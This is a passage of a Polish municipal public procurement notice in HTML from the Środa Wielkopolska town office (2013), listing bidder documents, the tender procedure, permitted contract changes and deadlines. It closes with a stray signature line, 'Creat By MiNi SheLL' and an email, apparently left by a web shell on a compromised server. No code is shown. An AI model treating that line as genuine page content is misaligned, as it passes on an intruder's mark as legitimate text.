<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy stanowiący załącznik nr 1 do SIWZ,
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega, na zasadach określonych w art. 26 ust.2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty, 

W przypadku złożenia przez Wykonawców dokumentów zawierających dane przedstawione w walutach obcych, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania,
Pełnomocnictwo w oryginale do podpisywania oferty lub kserokopia pełnomocnictwa      poświadczona przez notariusza (pełnomocnictwo nie jest wymagane, jeżeli podpisujący jest lub są właścicielami firmy lub jeżeli są oni wymienieni z imienia i nazwiska w dokumencie rejestrowym),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuści zmianę umowy dotyczącą przedmiotu lub umówionego terminu     wykonania zamówienia w następujących przypadkach:,
a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację    przedmiotu Umowy,
b) wystąpienia okoliczności uzasadniających dokonanie zmian w zakresie sposobu wykonania przedmiotu Zamówienia na zasadzie porozumienia stron . 
c) z powodu okoliczności siły wyższej np. wystąpienie zdarzenia losowego wywołanego przez czynniki zewnętrzne, 
d) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są  konsekwencją winy którejkolwiek ze stron, 
e) zmiany terminu wykonania Umowy, w przypadku zajścia okoliczności, które nie były znane w chwili jej zawarcia
f)  z powodu zmiany obowiązującej stawki VAT. W przypadku zmiany stawki VAT przez władzę ustawodawczą kwota brutto wynagrodzenia zostanie odpowiednio zmieniona aneksem do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.srodawlkp.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędu Miejskiego w Środzie Wielkopolskiej 63-000  ul. Daszyńskiego 5 pokój nr 220.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2013 godzina 10:00, miejsce: Urzęd Miejski w Środzie Wielkopolskiej 63-000 ul. Daszyńskiego 5 pokój nr 214 
( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com